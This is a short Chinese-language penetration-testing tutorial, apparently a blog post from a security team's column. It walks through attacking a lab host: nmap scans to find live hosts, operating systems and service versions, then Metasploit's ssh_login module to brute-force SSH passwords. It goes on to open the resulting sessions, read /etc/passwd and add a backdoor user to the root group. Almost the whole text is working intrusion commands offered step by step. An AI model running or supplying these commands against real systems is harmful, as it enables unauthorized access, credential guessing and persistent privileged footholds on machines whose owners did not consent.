內網滲透之掃描與SSH暴力破解
05-20
內網滲透之掃描與SSH暴力破解
![]()
![]()
來自專欄 ChaMd5安全團隊
掃描區域網存活主機
注意:以下使用的ip地址為我部署的環境網段,如果你在看本文,請靈活的進行學習以及使用。目標主機=靶機
nmap -sP 192.168.1.0/24

掃描靶機的操作系統以及版本號
nmap -O 192.168.1.111

掃描靶機的應用程序以及應用程序的版本號
nmap -sV 192.168.1.111

利用msf ssh_login模塊暴力破解靶機ssh密碼
先打開MSF 進入ssh_login模塊 show options查看提示
使用ssh_login模塊
use auxiliary/scanner/ssh/ssh_login

設定靶機IP
set RHOSTS 192.168.1.111

設置賬號文件/設置賬號
你可以設置賬號,但是只嘗試這一個,建議你使用賬號文件
#設置賬號set USERNAME root

#設置賬號文件set USER_FILE 密碼文件

設置密碼文件/設置密碼
你可以設置密碼,但是只嘗試這一個,建議你使用密碼文件
#設置密碼set PASSWORD 123456

#設置密碼文件set PASS_FILE 密碼文件

運行
你既可以使用run也可以使用exploit

會話
查詢會話方面的信息
sessions -i

打開會話
#打開id為1的會話 輸入ifconfig查詢ip 成功sessions -i 1

查看密碼文件
cat /etc/passwd

添加用戶設置密碼並添加到root組
useradd admin123passwd admin123usermod -g root admin123

推薦閱讀:
※發財樹說016-安全領域,360的顛覆者的來了
※入侵特斯拉——智能汽車安全性分析
※北上廣深的請注意,阿里聚安全來找你玩啦
※信息安全的商業模式
※如何找回WhatsApp被刪除的消息
TAG:網路安全 |
